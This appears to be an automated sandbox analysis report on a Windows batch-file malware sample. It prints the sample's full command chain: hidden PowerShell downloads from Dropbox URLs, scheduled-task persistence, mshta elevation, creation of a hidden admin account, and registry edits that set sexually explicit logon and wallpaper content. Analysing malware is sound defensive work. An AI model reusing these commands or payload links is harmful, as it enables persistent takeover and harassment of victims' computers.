Analysis
-
max time kernel
470s -
max time network
438s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
19-11-2024 20:58
General
-
Target
slut_keep_admin.bat
-
Size
1KB
-
MD5
9152962b6cef0d476f4e89127d8f0255
-
SHA1
b3b0b2686f0b27eff516ca35443feff8ff5f8026
-
SHA256
70fbc646366a3184c596ed7cba7055f1405350d164d104fcf4c2eec71c9d6434
-
SHA512
b609ecc36ea6e417b45099092d1511da78af19855252cbf5050d30abd6d2ee3def57518c5c8676e25e0786cfd22c7bd5dcd98a4da725db2fa102256ad4f3d80e
Malware Config
Extracted
https://download.oracle.com/java/17/archive/jdk-17.0.12_windows-x64_bin.exe
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 6 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Start PowerShell.
-
Downloads MZ/PE file
-
Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
A potential corporate email address has been identified in the URL: Mypchasbeenclaimedby@swtakeover2doyoualsowanttobeclaimedhttpstwitter.comswtakeover2
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 43 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Installs/modifies Browser Helper Object 2 TTPs 2 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 35 IoCs
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 29 IoCs
-
Modifies registry class 42 IoCs
-
Modifies registry key 1 TTPs 17 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious behavior: LoadsDriver 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\slut_keep_admin.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fo/k55ow4tu1244zp5vbpkdf/AH836nAwzR-bPAcWIy0mnFU?rlkey=6s1decbh5kqtkju1mr1sbjg4s&raw=1' -OutFile 'C:/ProgramData/slut/files.zip'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\7-Zip\7z.exe"C:/Program Files/7-Zip/7z.exe" x -aoa "C:/ProgramData/slut/files.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "installJavaAndApp.ps1"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jdk-17_windows-x64_bin.exe"C:\Users\Admin\AppData\Local\Temp\jdk-17_windows-x64_bin.exe" /s3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jds240910250.tmp\jdk-17_windows-x64_bin.exe"C:\Users\Admin\AppData\Local\Temp\jds240910250.tmp\jdk-17_windows-x64_bin.exe" "/s"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jdk17.0.12_x64\jdk17.0.1264.msi" /qn ADDLOCAL=ToolsFeature WRAPPER=15⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Program Files\Java\jdk-17\bin\java.exe"C:/Program Files/Java/jdk-17/bin/java" -jar C:/ProgramData/slut/Slut-SNAPSHOT.jar init2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Sets desktop wallpaper using registry
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\icacls.exeicacls "C:/ProgramData/slut/" /grant Users:F3⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exeicacls "C:/ProgramData/slutBat/" /grant Users:F3⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s +h -r C:/ProgramData/slut3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s +h -r C:/ProgramData/slutBat3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn UpdateslutFiles /F3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Register-ScheduledTask -TaskName "UpdateslutFiles" -Xml (Get-Content "c:\ProgramData\slutBat\updateSlut.xml" | Out-String) -User Admin -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d "c:\ProgramData\slut\wallpaper.jpg" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 0x00000001 /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "2" /f3⤵
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v WallpaperStyle /t REG_SZ /d "2" /f3⤵
-
-
C:\Windows\SYSTEM32\REG.exeREG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WallpaperEngine /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\slutBat\updateFiles.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fo/u9blgzv9sgym9aqmb2xnz/ABRiJrnxs33SHnlzqkJWBJI?rlkey=n0me9dg1p2lscfwspetihkq61&raw=1' -OutFile 'C:/ProgramData/slut/files.zip'"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /ve /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /v LockScreenImagePath /t REG_SZ /d "c:\ProgramData\slut\lockScreen.jpg" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /v LockScreenImageUrl /t REG_SZ /d "c:\ProgramData\slut\lockScreen.jpg" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /v LockScreenImageStatus /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Accent /v AccentColorMenu /t REG_DWORD /d 0x00cbc0ff /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Default /ve /t REG_SZ /d "c:\ProgramData\slut\insert.wav" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Current /ve /t REG_SZ /d "c:\ProgramData\slut\insert.wav" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Default /ve /t REG_SZ /d "c:\ProgramData\slut\eject.wav" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current /ve /t REG_SZ /d "c:\ProgramData\slut\eject.wav" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\AppEvents\Schemes\Apps\.Default\WindowsUAC\.Default /ve /t REG_SZ /d "c:\ProgramData\slut\default.wav" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\AppEvents\Schemes\Apps\.Default\WindowsUAC\.Current /ve /t REG_SZ /d "c:\ProgramData\slut\default.wav" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "This PC is claimed by ||CENSORED||" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Thank you for running the Slut app! You hereby confirm you are a needy slut and submit your pc to any changes I deem fit. You will see latex porn, cocks cumming, pathetic sluts being tormented and there is nothing you can do about it. And don't forget to thank me~!" /f3⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\cmd.execmd /k start https://twitter.com/intent/tweet?text=My%20pc%20has%20been%20claimed%20by%20%40sw_takeover2%20%F0%9F%92%9C%0A%0Ado%20you%20also%20want%20to%20be%20claimed%3F%0A%0Ahttps%3A%2F%2Ftwitter.com%2Fsw_takeover23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/intent/tweet?text=My%20pc%20has%20been%20claimed%20by%20%40sw_takeover2%20%F0%9F%92%9C%0A%0Ado%20you%20also%20want%20to%20be%20claimed%3F%0A%0Ahttps%3A%2F%2Ftwitter.com%2Fsw_takeover24⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffee26946f8,0x7ffee2694708,0x7ffee26947185⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:25⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2118047720682451306,10083763261471235138,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:15⤵
-
-
-
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v UseDefaultTile /t REG_DWORD /d 0x00000001 /f3⤵
- Modifies registry key
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Start-Process -FilePath C:\ProgramData\slutBat\x64\Register.cmd3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\slutBat\x64\Register.cmd" "4⤵
-
C:\Windows\system32\mshta.exemshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c C:\PROGRA~3\slutBat\x64\Register.cmd ::","","runas",1)(window.close)5⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\PROGRA~3\slutBat\x64\Register.cmd ::6⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 "C:\PROGRA~3\slutBat\x64\ExplorerBgTool.dll" /s7⤵
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Modifies registry class
-
-
-
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn slutMovieFile /F3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Register-ScheduledTask -TaskName "slutMovieFile" -Xml (Get-Content "c:\ProgramData\slutBat\videoTask.xml" | Out-String) -User Admin -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\net.exenet user /delete Censored3⤵
- Indicator Removal: Network Share Connection Removal
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /delete Censored4⤵
- Indicator Removal: Network Share Connection Removal
-
-
-
C:\Windows\SYSTEM32\net.exenet user /add Censored 12characters3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add Censored 12characters4⤵
-
-
-
C:\Windows\SYSTEM32\net.exenet localgroup administrators Censored /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators Censored /add4⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn Microsoft_Hardware_Launch_hardware /F3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Register-ScheduledTask -TaskName "Microsoft_Hardware_Launch_hardware" -Xml (Get-Content "c:\ProgramData\slutBat\censoredTask.xml" | Out-String) -User Admin -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown /l /f3⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\slut\whitelist.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding C0E0F57F0F50344751A26FEFB27424C02⤵
- Loads dropped DLL
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 5BF0F8AF89E8F32A74BBB2FAC4A95F42 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38c4055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Browser Extensions
1Event Triggered Execution
1Component Object Model Hijacking
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Account Manipulation
1Event Triggered Execution
1Component Object Model Hijacking
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Indicator Removal
1Network Share Connection Removal
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD5d67d094a9ee2bf00f282a87e7afe035b
SHA1931610e2cbf8c1cd96a9fe21d099eeffd3eac4b5
SHA256e56a4c2f9129a8bdeb7a84c80e1ce74e5b38329d9ce47fd4626cb066b46ed1d9
SHA512577313de3fa32c904ff30be84cf2192ac16ceae5a6c2d4abeab4c9de3abc3ca3a81624918ebebf8850013a451f750069afe81842a250334603b1e30f9d0ec8b8
-
Filesize
6KB
MD57369866495acb2d7e57397f06a3ab0ba
SHA1e75e828ba2898c74b4a682ce5291a69acf9cc55a
SHA2564d156eecbf6ca462d8cf772552fff874b167f87def9566837fb8e4fb347f29a5
SHA5126c1ae5229953259a258bf140241afa9dc50b642dbb5a11c183c8920678292266aecc26dd1254c3ce9184fe08c3068e2183a694a9a06f5972cc535015461ff825
-
Filesize
71KB
MD5584f0943414ad63ea20b56850b016877
SHA11f3799c45390b8f61ae24e254b968329a1f84200
SHA2561eb80756862d77f0d941290940c2458e79a08f34714292cfaca5ae8265a4cc1e
SHA51269281a36b2d52cf8d0201e5cc24f5cca3e7aef32213d9d84c347fadd90eb120fe2ad823eda2aec5e498606a0d9d76d91cc63516397cb5e233977cbe1d469eab1
-
Filesize
35B
MD54586c3797f538d41b7b2e30e8afebbc9
SHA13419ebac878fa53a9f0ff1617045ddaafb43dce0
SHA2567afb3a2dc57cb16223dddc970e0b464311e5311484c793abf9327a19ef629018
SHA512f2c722ae80d2c0dcdb30a6993864eb90b85be5311261012d4585c6595579582d1b37323613f5417d189adcd096fa948e0378c1e6c59761bf94d65c0a5c2f2fd3
-
Filesize
33B
MD516989bab922811e28b64ac30449a5d05
SHA151ab20e8c19ee570bf6c496ec7346b7cf17bd04a
SHA25686e0516b888276a492b19f9a84f5a866ed36925fae1510b3a94a0b6213e69192
SHA51286571f127a6755a7339a9ed06e458c8dc5898e528de89e369a13c183711831af0646474986bae6573bc5155058d5f38348d6bfdeb3fd9318e98e0bf7916e6608
-
Filesize
718KB
MD524b62be2c7febe328af40a269e545bfa
SHA19c150298dd10fc9844327969b572ab63f1754cee
SHA25616aed35c1ae9912ed7ee9aeeec96f823325399aa25a1450bb1cdc36c5394004d
SHA5121cc6280a324444a414505a07404f50a444c9e5c00bdedbf298e7a17ff29094fb8efa4ed5aff9738603cdafce84af34fe27434365325bd6b3a4a1de5641447f2c
-
Filesize
175B
MD50b7f7b921d15c8f4651075739aa1c64c
SHA1a2faad6346abc164c037e168f247ade8b3a50c82
SHA2567f75a65299b7abfad831523c53a38ca4454d63972b7b33390f0e73a070ae73b9
SHA51201c96b880b77581c9e149e29e8826a3f04a15c0ab5f5bc004988acaa267eef12e584ff7ac3c9294382093d029cc0cfa185596d8467906d80e9d1d4dda290c9ff
-
Filesize
413B
MD53633c132788228f4bd0bc823b171cd51
SHA157992c8305ab772df7dfcef676561bc3018bd3d9
SHA25657e3d5e312b2de24f94f9cdc51e844efa015a9926859174792cd1e490dab3960
SHA5129742e1b4e75718e3dd06daa755c4df16d08aea3f1292c8e96cb092679de8ddfd7e0e9fb3b6fb26c549a28a2eb367e404f40efb5ea27bfa286cc97ba3447f3d5f
-
Filesize
262B
MD5a588856a3e03afef31bd133bdf56bb05
SHA172c0c38e179a7f328392dd6d18a22821e5dc111b
SHA256d8bb26efaf49980f5483f99aa54ee5c4a08ff0a8671025d58232b82556122a3e
SHA512d7af00d7b75999a82883a43655a606217c712d0542432814b82a40018965fd0ccb9fc6c66deba7d8a4cbf1f800697646da1941338e3b91718df09d0dafb627c7
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD5ba6ef346187b40694d493da98d5da979
SHA1643c15bec043f8673943885199bb06cd1652ee37
SHA256d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA5122e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c
-
Filesize
152B
MD5b8880802fc2bb880a7a869faa01315b0
SHA151d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2
-
Filesize
1KB
MD58a9edc2637a0831aad9a3cecb16cd3f7
SHA1f7123060f59e64403d4cc7e63d39ae7ec4f96124
SHA2561d903b7c0c768239e58ec9e9b26fd1e42d97e68e0026c1854315f9adc5bd2b99
SHA512329f820ef9f5c4bec2e039ac8225b17152bc3ff7fc91596783b1f525aa124c0c79513c9ae0d2ce90016f35eedb3dc0df9acb264ae0fb84b6b671c5055bd1f4ba
-
Filesize
741B
MD540494560f3e49a332fed2345e154fd74
SHA1a8ae0ed06950dafc7ffb47f0c77eaac79403fc96
SHA256dc63c9b6e73ba0fd03a8d9cbf9b84bca48c1cac3f65b2b5f841908d5d295939f
SHA51235ae5565bf076876218b8600f3e1e48d7cb09f2dcaba6aa5e3cf1a6f4f392ead438101e2701226c2b247012322479d3c491c38207f889c03061099654b3916ef
-
Filesize
7KB
